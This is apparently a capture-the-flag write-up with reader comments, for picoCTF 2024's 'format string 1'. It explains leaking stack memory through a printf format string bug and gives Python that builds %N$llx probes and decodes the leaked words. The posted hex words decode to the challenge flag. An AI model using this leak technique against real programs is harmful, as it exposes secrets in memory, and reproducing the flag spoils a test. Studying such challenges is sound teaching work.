pico2024 format string 1

The format string vulnerability lets us walk up the stack and read its contents: the program passes our input to printf as the format string, so each conversion specifier consumes another "argument" that was never supplied, i.e. whatever is sitting in the argument registers and then on the stack. Since this is a 64-bit executable, we use %llx to print each value as a full 64-bit number in hexadecimal. A positional specifier such as %16$llx selects argument 16 directly, so we can pick individual stack words without printing everything before them (on x86-64 the first five variadic arguments are taken from registers, so %6$llx is the first word that actually comes from the stack). Each 8-byte word then has to be reversed, because x86-64 is little endian and the first character of the string lives in the least significant byte of the value; after that we convert the hex bytes to ASCII. Note that %llx drops leading zero bytes, so the last chunk of the flag comes out shorter than 16 hex digits.
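The leak-and-decode step described above, as an added example that is not the video's own code: it builds a batched positional probe, parses what printf echoes back, and undoes the little-endian byte order by packing each leaked word as a 64-bit integer, which also restores the leading zero bytes that %llx drops. The five sample words are the ones posted in the comments; the stack offsets 14 to 18 attached to them are assumed for illustration only, and the separator, function names and the x86-64 register convention noted in the comments are my choices, not something taken from the challenge binary.

```python
import re
import struct

# Constructed sample: stack words as %N$llx prints them (hex, no 0x prefix,
# leading zero bytes dropped). The offsets are assumed for illustration;
# the real offset depends on where the input buffer sits on the stack.
LEAKED = {
    14: "7b4654436f636970",
    15: "355f31346d316e34",
    16: "3478345f33317937",
    17: "31655f673431665f",
    18: "7d383130386531",
}

# On x86-64 (System V ABI) printf(fmt) takes the first five variadic arguments
# from rsi, rdx, rcx, r8 and r9, so %6$llx is the first 8-byte word read from
# the stack. Lower positions just echo register contents.
FIRST_STACK_OFFSET = 6
SEP = "|"  # separator between conversions so the output can be split again


def make_probe(start, count, spec="llx"):
    """One payload that dumps `count` consecutive positional arguments."""
    return SEP.join(f"%{n}${spec}" for n in range(start, start + count))


def parse_leak(output, start):
    """Map printf's output for make_probe(start, ...) back to {offset: int}."""
    words = {}
    for i, tok in enumerate(output.split(SEP)):
        tok = tok.strip()
        if tok in ("", "(nil)"):  # %p prints (nil) for a zero pointer
            words[start + i] = 0
        else:
            words[start + i] = int(tok, 16)  # accepts an optional 0x prefix
    return words


def word_to_bytes(word):
    """Undo little-endian order: the lowest byte of the value is the first
    byte in memory. Packing as <Q restores any leading zero bytes %llx
    dropped; trailing NULs are stripped since they terminate the string."""
    return struct.pack("<Q", word).rstrip(b"\x00")


def decode_words(words):
    """Concatenate decoded bytes in ascending stack order."""
    return b"".join(word_to_bytes(words[k]) for k in sorted(words))


FLAG_RE = re.compile(rb"picoCTF\{[^}]*\}")


def find_flag(blob):
    """Return the flag string if the decoded stack bytes contain one."""
    m = FLAG_RE.search(blob)
    return m.group(0).decode() if m else None


def recover_flag(leaked_hex):
    """Full pipeline for a dict of {offset: hex string}."""
    return find_flag(decode_words({k: int(v, 16) for k, v in leaked_hex.items()}))


if __name__ == "__main__":
    # Payload to paste into the program to dump the first 20 stack words.
    print(make_probe(FIRST_STACK_OFFSET, 20))
    print(recover_flag(LEAKED))
```

Sending one batched probe is usually better than one %N$llx per run: the stack layout is identical between the specifiers, and the separators make the output unambiguous even when a word prints as fewer than 16 hex digits.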
Comments

Thank you very much for this. I'm a beginner on these concepts and it's very helpful to have an experienced demonstration to follow along with.

clancycunningham

The way to find a solution with a good idea. GG Sir!

SamuelVolder

No proper explanation, sir. First, IDK why all this is being done, why, and what for?

ROBINHOOD-yx

Nice vid. %14$lx and %14$p both do the job in 64-bit too. A couple of lines of Python saves a lot of hassle with 64-bit chunks:

```python
# Hex words as printed by %N$lx, one per 8-byte stack slot; the last one is
# only 7 bytes because %lx drops the leading zero byte (the string's NUL).
chunks_64 = ['7b4654436f636970', '355f31346d316e34', '3478345f33317937',
             '31655f673431665f', '7d383130386531']
flag = ''
for chunk in chunks_64:
    decoded_chunk = ''
    for i in range(0, len(chunk), 2):          # two hex digits per byte
        c = chr(int(chunk[i] + chunk[i + 1], 16))
        decoded_chunk += c
    flag += decoded_chunk[::-1]                # little endian: reverse the bytes
print(flag)
```

robertdreyfus